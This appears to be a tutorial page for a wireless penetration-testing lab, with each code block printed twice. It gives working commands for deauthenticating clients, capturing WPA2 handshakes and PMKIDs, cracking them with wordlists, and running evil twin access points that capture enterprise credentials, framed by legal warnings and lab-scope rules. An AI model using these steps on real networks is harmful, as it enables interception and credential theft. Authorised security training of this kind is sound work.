Last reviewed

Intermediate

Wireless Testing Lab Setup

Set up a dedicated wireless security testing environment with the right hardware, drivers, and practice access points. Practice WPA2/WPA3 cracking, evil twin attacks, and wireless reconnaissance in a controlled setting.

Legal Warning

Only test wireless networks you own or have explicit written authorization to test. Unauthorized wireless interception is illegal in most jurisdictions. Always use an isolated lab environment.

RF Scope Boundary

Use a dedicated practice AP, a known test client, and a channel you control. Stop if captures include unrelated clients, neighboring SSIDs, or traffic outside your written scope.

Lab Runbook

Use this page as a controlled lab build, not a production hardening guide. Validate isolation before running exercises and write down the cleanup command before starting.

High risk Intermediate 1-2 hr

Plan

4 GB; 20 GB. $30-60 adapter/AP. Isolation: Only your AP, your clients, and your RF test space.

Build

  • - Monitor-mode adapter
  • - Practice AP
  • - Capture workflow

Validate

  • - Adapter enters monitor mode
  • - AP channel is known
  • - Capture includes your test handshake only

Exercise

Run only the exercises tied to this lab and save screenshots, command output, logs, and timestamps outside disposable VMs.

Clean Up

  • - Restore NetworkManager
  • - Stop monitor mode
  • - Power down practice AP

Recommended Wireless Adapters

Not all WiFi adapters support monitor mode and packet injection. These adapters are tested and recommended for penetration testing:

Adapter Chipset Bands Monitor Mode Best For
Alfa AWUS036AXML MediaTek MT7921AU 2.4/5/6 GHz (WiFi 6E) Modern WiFi 6E testing
Alfa AWUS036ACH Realtek RTL8812AU 2.4/5 GHz (AC) Dual-band, strong range
Alfa AWUS036ACM MediaTek MT7612U 2.4/5 GHz (AC) Best Linux support, reliable
Panda PAU09 Ralink RT5572 2.4/5 GHz (N) Budget option, plug & play
TP-Link TL-WN722N v1 Atheros AR9271 2.4 GHz (N) Classic beginner choice (v1 only)

Version Matters

Many adapters change chipsets between hardware revisions. The TP-Link TL-WN722N v1 uses Atheros AR9271 (great for pentesting), but v2/v3 use Realtek chips that don't support monitor mode without patched drivers. Always verify the chipset before purchasing.

Driver Setup on Kali

bash 
# Most Alfa adapters work out of the box on Kali
# Update and install wireless tools
sudo apt update && sudo apt install -y \
    aircrack-ng \
    hcxdumptool \
    hcxtools \
    hostapd-wpe \
    bettercap \
    wifite \
    mdk4 \
    pixiewps \
    reaver

# For RTL8812AU chipset (AWUS036ACH) - if not auto-detected
sudo apt install -y realtek-rtl88xxau-dkms

# For MT7921AU chipset (AWUS036AXML / WiFi 6E)
# Requires kernel 5.18+ (Kali 2023.1+)
# Check if kernel supports it:
modinfo mt7921u

# Verify adapter is detected
iwconfig
# Or
iw dev

# Check chipset info
lsusb | grep -i wireless
airmon-ng
# Most Alfa adapters work out of the box on Kali
# Update and install wireless tools
sudo apt update && sudo apt install -y \
    aircrack-ng \
    hcxdumptool \
    hcxtools \
    hostapd-wpe \
    bettercap \
    wifite \
    mdk4 \
    pixiewps \
    reaver

# For RTL8812AU chipset (AWUS036ACH) - if not auto-detected
sudo apt install -y realtek-rtl88xxau-dkms

# For MT7921AU chipset (AWUS036AXML / WiFi 6E)
# Requires kernel 5.18+ (Kali 2023.1+)
# Check if kernel supports it:
modinfo mt7921u

# Verify adapter is detected
iwconfig
# Or
iw dev

# Check chipset info
lsusb | grep -i wireless
airmon-ng

USB Passthrough for VMs

If running Kali in a VM, you must pass the USB WiFi adapter through to the guest.

VMware

  1. VM → Removable Devices → Select adapter
  2. Click "Connect" to pass through
  3. Or: VM Settings → USB Controller → Add USB device
  4. Verify with lsusb in Kali

VirtualBox

  1. Install VirtualBox Extension Pack
  2. Settings → USB → Enable USB 3.0
  3. Add USB device filter for adapter
  4. Start VM — adapter auto-attaches

Practice Access Point Setup

Create your own vulnerable access point for testing. Use a second WiFi adapter or a cheap router with OpenWrt for the target AP.

bash 
# Install hostapd
sudo apt install -y hostapd dnsmasq

# Create hostapd config for WPA2 AP
cat > /tmp/hostapd.conf << 'EOF'
interface=wlan1          # Use second adapter for AP
driver=nl80211
ssid=PentestLab_AP
channel=6
hw_mode=g
ieee80211n=1

# WPA2 with weak password (for cracking practice)
wpa=2
wpa_passphrase=password123
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
EOF

# Start the access point
sudo hostapd /tmp/hostapd.conf

# In another terminal, set up DHCP for clients
cat > /tmp/dnsmasq.conf << 'EOF'
interface=wlan1
dhcp-range=192.168.100.10,192.168.100.50,12h
server=8.8.8.8
EOF

sudo ifconfig wlan1 192.168.100.1 netmask 255.255.255.0
sudo dnsmasq -C /tmp/dnsmasq.conf
# Install hostapd
sudo apt install -y hostapd dnsmasq

# Create hostapd config for WPA2 AP
cat > /tmp/hostapd.conf << 'EOF'
interface=wlan1          # Use second adapter for AP
driver=nl80211
ssid=PentestLab_AP
channel=6
hw_mode=g
ieee80211n=1

# WPA2 with weak password (for cracking practice)
wpa=2
wpa_passphrase=password123
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
EOF

# Start the access point
sudo hostapd /tmp/hostapd.conf

# In another terminal, set up DHCP for clients
cat > /tmp/dnsmasq.conf << 'EOF'
interface=wlan1
dhcp-range=192.168.100.10,192.168.100.50,12h
server=8.8.8.8
EOF

sudo ifconfig wlan1 192.168.100.1 netmask 255.255.255.0
sudo dnsmasq -C /tmp/dnsmasq.conf

WPA2 Cracking Exercise

bash 
# Step 1: Enable monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# Step 2: Scan for target AP
sudo airodump-ng wlan0mon

# Step 3: Capture handshake from target AP
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Step 4: In your lab only, deauth your own test client to force re-authentication
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# Wait for "WPA handshake" in airodump output

# Step 5: Crack with wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# Alternative: Use hashcat for GPU acceleration
# Convert capture to hashcat format
hcxpcapngtool -o hash.hc22000 capture-01.cap
# Crack with hashcat
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
# Step 1: Enable monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# Step 2: Scan for target AP
sudo airodump-ng wlan0mon

# Step 3: Capture handshake from target AP
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Step 4: In your lab only, deauth your own test client to force re-authentication
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# Wait for "WPA handshake" in airodump output

# Step 5: Crack with wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# Alternative: Use hashcat for GPU acceleration
# Convert capture to hashcat format
hcxpcapngtool -o hash.hc22000 capture-01.cap
# Crack with hashcat
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt

Modern Attacks: PMKID & WPA3

bash 
# PMKID attack doesn't require deauthing any clients
# Use hcxdumptool to capture PMKID

# Capture PMKID from target AP
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --filterlist_ap=targets.txt --filtermode=2

# Convert to hashcat format
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng

# Crack with hashcat
hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt
# PMKID attack doesn't require deauthing any clients
# Use hcxdumptool to capture PMKID

# Capture PMKID from target AP
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --filterlist_ap=targets.txt --filtermode=2

# Convert to hashcat format
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng

# Crack with hashcat
hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt

WPA3 Testing

WPA3-SAE is resistant to offline dictionary attacks, but transition mode (WPA2/WPA3 mixed) may still be vulnerable to downgrade attacks. Use Dragonblood tools to test WPA3-SAE implementations. WiFi 6E testing also depends on country code, driver support, and legal use of 6 GHz channels. Keep 6E tests on authorized hardware only.

Evil Twin Attack Lab

bash 
# hostapd-wpe creates a rogue AP for authorized WPA-Enterprise lab testing
  # Do not run this near networks or clients outside your written test scope

# Configure hostapd-wpe
sudo nano /etc/hostapd-wpe/hostapd-wpe.conf
# Set: ssid=CorpWiFi  (match target SSID)
# Set: interface=wlan0
# Set: channel=6

# Start evil twin
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

# Captured credentials appear in the terminal
# MSCHAPV2 hashes can be cracked with asleap or hashcat

# Alternative: Use bettercap for automated evil twin
sudo bettercap -iface wlan0mon
# In bettercap:
# > wifi.recon on
# > wifi.deauth AA:BB:CC:DD:EE:FF
# > wifi.ap
# hostapd-wpe creates a rogue AP for authorized WPA-Enterprise lab testing
  # Do not run this near networks or clients outside your written test scope

# Configure hostapd-wpe
sudo nano /etc/hostapd-wpe/hostapd-wpe.conf
# Set: ssid=CorpWiFi  (match target SSID)
# Set: interface=wlan0
# Set: channel=6

# Start evil twin
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

# Captured credentials appear in the terminal
# MSCHAPV2 hashes can be cracked with asleap or hashcat

# Alternative: Use bettercap for automated evil twin
sudo bettercap -iface wlan0mon
# In bettercap:
# > wifi.recon on
# > wifi.deauth AA:BB:CC:DD:EE:FF
# > wifi.ap

Troubleshooting FAQ

Adapter not detected in Kali VM
  • Ensure USB passthrough is enabled (see VM setup section above)
  • Check lsusb — adapter should appear in the list
  • Try a different USB port (USB 2.0 vs 3.0 can matter)
  • Install VirtualBox Extension Pack for USB 3.0 support
  • Reboot the VM after connecting the adapter
Monitor mode fails or "device busy"
  • Kill interfering processes first: sudo airmon-ng check kill
  • Disable NetworkManager for wifi: sudo systemctl stop NetworkManager
  • Try manual mode: sudo ip link set wlan0 down && sudo iw dev wlan0 set type monitor && sudo ip link set wlan0 up
  • Some chipsets need patched drivers — check the adapter's GitHub issues
No handshake captured after deauth
  • Ensure you're on the correct channel — match the target AP's channel
  • Get closer to the AP and client for better signal
  • Try targeting specific clients: aireplay-ng -0 5 -a AP_BSSID -c CLIENT_MAC wlan0mon
  • Some clients don't auto-reconnect — try multiple deauths with pauses
  • Use PMKID attack instead (doesn't need active clients)
5 GHz networks not showing up
  • Verify adapter supports 5 GHz: iw phy | grep -A 20 "Frequencies"
  • Scan both bands: sudo airodump-ng --band abg wlan0mon
  • Regulatory domain may limit channels: sudo iw reg set US
  • Some 2.4 GHz-only adapters (like TL-WN722N) won't see 5 GHz networks

Go Deeper After Setup

Wireless Pentesting Use the lab for authorized wireless methodology practice. NetHunter Setup Add a mobile testing platform when the RF lab is stable.

Operational Safety Baseline

Apply these rules before running any lab command on this page.

  • Work only on systems you own or have explicit authorization to test.
  • Keep vulnerable services off your home LAN and off public interfaces.
  • Take clean snapshots before every exercise and before every vulnerable configuration change.
  • Use dedicated cloud accounts, subscriptions, and projects with billing alerts before deployment.
  • Write down the teardown command before you run the setup command.

Validation Checkpoints

  • -Adapter enters monitor mode
  • -AP channel is known
  • -Capture includes your test handshake only

Cleanup And Rollback

  • -Restore NetworkManager
  • -Stop monitor mode
  • -Power down practice AP
  • -Delete captures that include unrelated clients

Practice Next

Wireless Pentesting NetHunter Setup

Related Topics

Wireless Pentesting

Full wireless testing methodology

Kali Setup

Configure your Kali attack machine

NetHunter Setup

Mobile wireless testing with Android

Network Security

Broader network security testing